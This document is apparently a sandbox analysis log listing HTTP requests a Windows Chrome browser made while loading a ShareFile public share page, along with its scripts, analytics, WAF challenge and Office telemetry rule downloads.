            Source: global trafficHTTP traffic detected: GET /css/sharefilebrand/sf-spinner.svg HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=c1s+nr1v7dakGJOPy9hufhRvmBzI3tzIakbYCc4BJLwJ2kkULT2o+9Nkere7ST4oxsNUu+HSmW7uQovfPXJN+OEdiAlNhGp77mLkbi0OeOU34rmhvotJLausHaJra/B6E3XmL6KCWBxvEkNuj30jHzCTbc7U0GR2tOQKjnyGE1eZ; AWSALBTGCORS=c1s+nr1v7dakGJOPy9hufhRvmBzI3tzIakbYCc4BJLwJ2kkULT2o+9Nkere7ST4oxsNUu+HSmW7uQovfPXJN+OEdiAlNhGp77mLkbi0OeOU34rmhvotJLausHaJra/B6E3XmL6KCWBxvEkNuj30jHzCTbc7U0GR2tOQKjnyGE1eZ; AWSALB=dK1C0GjtASVTA5tLGFNZfnupLnUE7gbaRlsnuyP39sJemVdiw2K+fG0pZvkS5LB+OQ+Kt0WycuPqo8V7IVwoSXcAYo1SOMIDUqGLaPI4v9YNuKLe4G7ahN7i5+hv; AWSALBCORS=dK1C0GjtASVTA5tLGFNZfnupLnUE7gbaRlsnuyP39sJemVdiw2K+fG0pZvkS5LB+OQ+Kt0WycuPqo8V7IVwoSXcAYo1SOMIDUqGLaPI4v9YNuKLe4G7ahN7i5+hv
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/index.563cd3fc21b70465916a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW
            Source: global trafficHTTP traffic detected: GET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/public/share/web-189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW
            Source: global trafficHTTP traffic detected: GET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/public/share/web-189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW
            Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: premierbb.sf-api.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALBTGCORS=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALB=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ; AWSALBCORS=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ
            Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTGCORS=HfFXdik5qEoeX3RwOj8CnuNZ/ABGidEQ70esUF6tG514qgXqDi6x9vx8rUPsRy8qtq47Iy3x2uo6y1Jh24yZyrwSIXxdyjAHblsTY09e6AUNuaMcpZvU+YUoCcEqzpZ+il5rUhxXGxMFPNPlfEVgflp4fmcAKEz8cRzFXAXsMfxh; AWSALBCORS=HYjHlg5Eqd47PjTAYZug0VZBifgCfwQ6c3evueer19dS6ae7+Q7x1Aigrq/0K/RRTAjiuk1dEgh7fH7QslTWASHADMEKlEp8nTULTaixl5pH5PUdrrZH7w5FbtEu
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-conversations-pilet/1.94.6/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-workflows-pilet/0.119.14/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALBTGCORS=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; AWSALB=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ; AWSALBCORS=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ
            Source: global trafficHTTP traffic detected: GET /agent/static/74b07336-7560-45fc-7cd1-95032a784d52/pendo.js HTTP/1.1Host: citrix-sharefile-content.customer.pendo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1 HTTP/1.1Host: o49063.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/verify HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-conversations-pilet/1.94.6/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-conversations-pilet/1.94.6/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dc-pilet/1.379.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
